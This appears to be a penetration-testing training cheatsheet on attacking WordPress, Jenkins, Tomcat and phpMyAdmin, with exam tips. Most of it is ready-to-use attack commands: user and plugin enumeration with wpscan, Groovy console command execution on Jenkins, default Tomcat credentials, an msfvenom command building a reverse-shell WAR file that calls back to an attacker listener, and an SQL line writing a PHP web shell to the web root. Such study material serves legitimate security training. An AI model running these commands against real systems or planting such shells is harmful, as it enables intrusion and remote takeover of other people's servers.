Attacking Common Applications
Web
Overview
Exploiting CMS and common web applications.
0
Exercises
1
Flashcards
1
Mind Maps
Cheatsheet
WordPress
wpscan --url http://target --enumerate u,p,t # Enumerate WordPress users, plugins, themes
Jenkins
println "whoami".execute().text # Jenkins Groovy Script Console RCE
Tomcat
tomcat/tomcat # Try default credentials msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=4444 -f war > shell.war # Create malicious WAR file
phpMyAdmin
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php' # Write web shell via SQL
Command Examples
Common Pitfalls
- Not checking plugin versions
- Missing admin panels
Exam Survival Tips
- Check /manager /admin
- Look for exposed configs